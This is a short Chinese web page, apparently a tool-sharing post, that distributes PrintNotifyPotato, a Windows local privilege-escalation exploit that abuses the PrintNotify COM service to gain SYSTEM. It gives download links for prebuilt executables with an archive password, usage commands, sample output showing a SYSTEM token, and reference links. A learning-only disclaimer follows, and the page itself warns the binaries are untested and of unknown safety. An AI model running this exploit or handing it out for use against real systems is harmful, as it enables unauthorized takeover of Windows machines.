目录导航
PrintNotifyPotato简介
又一个土豆,使用PrintNotify COM服务进行提权
适用于
Windows 10 – 11
Windows Server 2012 – 2022
PrintNotifyPotato下载地址
- PrintNotifyPotato-NET2.exe 22 KB
- PrintNotifyPotato-NET35.exe 22 KB
- PrintNotifyPotato-NET46.exe 22.5 KB
云中转下载地址:
yunzhongzhuan.com/#sharefile=vjJOpwil_112919
解压密码:www.ddosi.org
使用方法:
C:\Windows\Temp >PrintNotifyPotato.exe
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaaaaaa aaaaaaa aaa aaaa
aaaaaaaaaaa aaaaaaaaa aaaaaaaaa aaa aaaa
aaaaaaaaaaa aaaa aaa aaaa aaaa aaa aaaa
aaaa aaa aaa aaaa aaaa aaaaaaa
aaaa aaa aaaaaaa aaa aaaaaaa
aaaa aaa aaaaaaaaa aaa aaaaaaaa
aaaa aaa aaaa aaa aaa aaa aaaa aaa
aaaa aaa aaa aaaa aaaa aaaa aaa aaaa
aaaa aaa aaa aaaaa aaaa aaaa aaa aaaa
aaaa aaa aaaaaaaaaa aaaaaaaa aaa aaa
aaaa aaa aaaa aaaa aaaaa aaa aaaa
Github: https://github.com/BeichenDream/PrintNotifyPotato
Example:
PrintNotifyPotato.exe whoami
PrintNotifyPotato.exe cmd interactive
C:\Windows\Temp >PrintNotifyPotato.exe whoami
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x3d4
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1016
[*] process start with pid 7272
nt authority\system
C:\Windows\Temp >项目地址:
github.com/BeichenDream/PrintNotifyPotato
参考
code.google.com/p/google-security-research/issues/detail?id=128
zcgonvh
github.com/antonioCoco/JuicyPotatoNG
注意事项
工具未进行测试,安全性未知,自行判断或仅放在虚拟机中进行测试.
本文仅作个人学习记录,涉及技术仅供学习参考,禁止用于其他!!!未经授权请勿利用文章中提及的技术对任何计算机系统进行非法攻击。利用此文所提供的技术而造成的直接或间接后果和损失,均由使用者本人负责。
转载请注明出处及链接